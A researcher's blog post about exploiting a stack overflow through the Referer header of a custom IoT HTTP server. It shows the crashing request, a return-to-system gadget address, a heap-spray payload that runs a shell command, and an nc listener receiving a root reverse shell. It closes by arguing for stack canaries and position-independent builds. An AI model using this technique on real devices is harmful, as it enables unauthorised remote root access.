Back when I first read about this thing called “hacking” I thought I’d be spending all my days overflowing NSA buffers with plagiarized shell code and going by some cool hacker name like “1337BadGeR”. Sadly for me, upon entering the actual world, I had to get back in line with reality and learn my dreams of glory were perhaps just dreams, but sometimes those pesky __stack_chk_fail and __stack_chk_guard don’t show up in a binary and I get to have some fun. Of course, stack canaries aren’t the only lines of defense, but we’ll get into that later; a little exposition is required first.

A while ago I was looking at an IOT device to which I had SSH access, allowing me to pull and look at binaries, but no access to the proprietary source code. Generally I find these types of assessments a lot of fun because reverse engineering has always been a hobby of mine and the binaries gives me enough information to find things I might miss otherwise. This device was running an HTTP server that I wanted to check out to make sure everything was implemented safely, so I pulled it, fired up Ghidra (thanks NSA), and tossed it in there. Two things were immediately apparent: this was a custom HTTP server written in C and there was no __stack_chk anything in sight. This definitely got my attention; the next natural step here is to look for places to overflow a buffer. Ghidra is great for this since it lets you easily look up calls to of popular culprits, such as strcpy.

At this point though, all I could see was a bunch of pointer arithmetic for arguments passed to dangerous functions, so some more work was necessary: I needed to find out how the server was processing and storing HTTP requests to find out which (if any) information I controlled was being used there. This process basically consisted of working backwards from potential dangerous function calls and reverse engineering the ARM assembly/Ghidra decompiled output. I eventually built up a struct http_request custom Ghidra type that contained all of the parsed information. This all lead to discovering the following code (obviously simplified):

char vuln_buf [SIZE];
    ...
strcpy(vuln_buf, req->referer_header);

The first thing I did was verify that this was indeed a stack buffer overflow was the old faithful “set the return address to AAAA”

GET / HTTP/1.1\r\n
Referer: <PADDING>AAAA\r\n\r\n

Crash trying to execute code at 0x41414141. Nice.

This is still partially the real world though, and non executable stacks and ASLR are a default that were not disabled in this case. This is where this exploit gets fun though. Here are the restrictions:

  1. This is an HTTP server with injection in the headers: \r and \n are special
  2. The stack and heap being marked as non executable prevents trivial code execution
  3. \x00 stops strcpy
  4. ASLR severely limits building a ROP chain without some sort of bypass (there is another issue with building a ROP chain that I’ll bring up later)

If you think that looks like a bad set of things for the would be hacker, you’d be right: it is. Bummer. There is one thing to my advantage though: the executable isn’t compiled as a position independent executable. That means that I can get code execution to jump once to an address that doesn’t have a null byte, \n, or \r, and that jump must be to an address in the executable itself, not the libraries it loads. That address will be the same for all distributed versions of the binary since the C code just compiled once per version and distributed as a binary. This makes any exploit reliable on a different device as long as it is the same version. Given that single jump, I need to get full code execution. Time to go gadget hunting!

A quick diversion into why I thought I could keep going at this point: this HTTP server was custom written to provide special functionality for this device alone. Incidentally, this special functionality relied a lot on C’s system and popen functions. My plan of attack here was fairly straightforward: I wanted to jump to a call to system whose arguments were a register I controlled (in this case I controlled pc, r4, and r5). Of course, simple plans never seem to be simple to implement.

One issue that arises during my gadget hunting could potentially make this issue unexploitable: I won’t be able to get a jump address that doesn’t have \x00 in it anywhere (this is a small binary and I can only use addresses in the binary itself reliably), but the Referer header must take the form [^\x00]+\r\n due to some earlier processing bugging out on a null byte anywhere in the header. This could have been the nail in the coffin, but there was one saving grace: the code would transform Referer: carvesystems.com\r\n into Referer: carvesystems.com\x00\x00 during header processing. This is actually a clever move on the developers’ part: they don’t have to malloc a new buffer just to hold the Referer header since they already have it in memory. For me though, this means that I can get \x00 into my return address: I’m still in business.

My original plan was to hopefully find a gadget that did something like this:

add        r0, sp, #xx
bl         system

and with some luck have part of my request living at that point on the stack. These were some high dreams, and I did find a gadget that was a single dereference away (that was a sad moment), but ultimately the binary was not so kind. However, after a bit of searching I found this gem:

00011110 cpy        r0, r5
00011114 bl         system

I control r5 and I can jump to 00011110 by using 0d011110. This might be my gadget, but what could I possibly set r5 to? This is when the fact that we’re dealing with a 32 bit executable becomes helpful: heap spraying is much simpler with 32 bit executables. Why not try to find a spot I can heap spray and set r5 to something that will most likely be on the heap? There are a few things in the way of this plan:

  1. This server is running on an embedded system and embedded system engineers have religious convictions against using the heap
  2. A vast majority of the endpoints this server handles require authentication

I want unauthenticated RCE, not authenticated: authenticated RCE isn’t what all of the cool kids write blog posts about. I need to hunt through this binary to find a use of malloc that requires no authentication. Well, luckily for me, this happens once: there is a single line of code that will put request data into a buffer created with malloc before checking authentication. Take that, embedded developers, even you might have to use malloc sometimes.

Here is where we stand then:

  1. We can jump a single time
  2. We have a gadget that will put an address we control into r0 before calling system
  3. We can make an unauthenticated request that will put some data we control onto the heap

So we go ahead and spray the heap with a ton of copies of /bin/touch /tmp/haxxed; such that a static “probably the heap” pointer lands in this string. Then we set r5 to “probably the heap” with our overflow and end up with this request:

GET / HTTP/1.1\r\n
Referer: <PADDING><r5 = probably the heap>\x01\x11\x01\r\r\n\r\n

This works because we end up with this huge string:

/bin/touch /tmp/haxxed;/bin/touch /tmp/haxxed;..../bin/touch /tmp/haxxed;

on the heap and the static pointer hopefully lands somewhere in that string like this:

/bin/touch /tmp/haxxed;/bin/touch /tmp/haxxed;..../bin/touch /tmp/haxxed;
       ^-- landing here is still OK

Eventually the entire command will be executed.

After a couple failed attempts and tweaking the size of the sprayed area, /tmp/haxxed is sitting there on the target’s filesystem. After developing a more complex command (left as an exercise to the reader), I end up with a reverse shell and am greeted by root access to the device:

$ nc -l -p 3567
id
uid=0(root) gid=0(root) groups=0(root)

Nice.

Takeaways

The point of this post isn’t just that I think this is a clever exploit, but that there is a reason we have so many different protections on binaries. Turning off just a single one of those protections can be catastrophic if you have a dedicated attacker. It is easy to forget why these protections were put into place since they’ve been around so long and you don’t often see stack buffer overflow exploits in modern software, but they have not lost their importance. In this case, the lack of stack cookies and the fact that the executable wasn’t position independent were the two things that allowed me to own the device, even with strict restrictions as well as ASLR and NX in place.